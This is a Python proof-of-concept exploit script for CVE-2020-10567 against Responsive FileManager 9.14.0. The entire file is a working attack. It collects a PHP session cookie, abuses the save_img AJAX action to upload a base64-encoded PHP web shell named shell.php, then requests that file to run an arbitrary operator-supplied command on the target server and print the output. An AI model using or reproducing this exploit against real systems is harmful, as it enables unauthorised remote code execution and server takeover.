#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : POC_CVE-2020-10567.py
# Author             : Pierre_Adams
# Date created       : 26/03/2026


import requests
import argparse
import base64

def parseArgs():
    parser = argparse.ArgumentParser(
        description="Exploit RESPONSIVE filemanager v.9.14.0 (not Main branche!!)"
    )
    parser.add_argument(
        "-C",
        "--cookie",
        required=False,
        help="Cookie"
    )
    parser.add_argument(
        "-c",
        "--command",
        required=True,
        help="Command to execute"
    )

    parser.add_argument(
        "-u",
        "--url",
        required=True,
        help="RESPONSIVE filemanager url"
    )
    return parser.parse_args()

args = parseArgs()

def payload_encode():
    php_code = f"""<?php
$output = shell_exec('{args.command}');
echo "$output";
?>"""
    encoded = base64.b64encode(php_code.encode('utf-8')).decode('utf-8')
    return encoded

session = requests.Session()

if args.cookie :
    phpsessid = f"{args.cookie}"
    print ("[>] Cookie : " + phpsessid)

else :
    print("[>] Cookie collecting ... ")
    r = session.get(f"{args.url}/filemanager/dialog.php")
    phpsessid = session.cookies.get("PHPSESSID")
    if not phpsessid:
        print("[>] Aucun cookie PHPSESSID trouvé.")
        exit(1)

print(f"[>] Cookie collect : PHPSESSID={phpsessid}")

print("[>] Request POST Send")

headers = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": f"PHPSESSID={phpsessid}"
}

payload = payload_encode()

data = {
    "url": "data:image/jpeg;base64,"+payload,
    "path": "",
    "name": "shell.php",
}

response = session.post(
    f"{args.url}/filemanager/ajax_calls.php?action=save_img",
    headers=headers,
    data=data,
)

if response.status_code == 200:
    print("[>] Payload send")

r = session.get(f"{args.url}/source/shell.php")
print("[>] Response:\n\n" + r.text)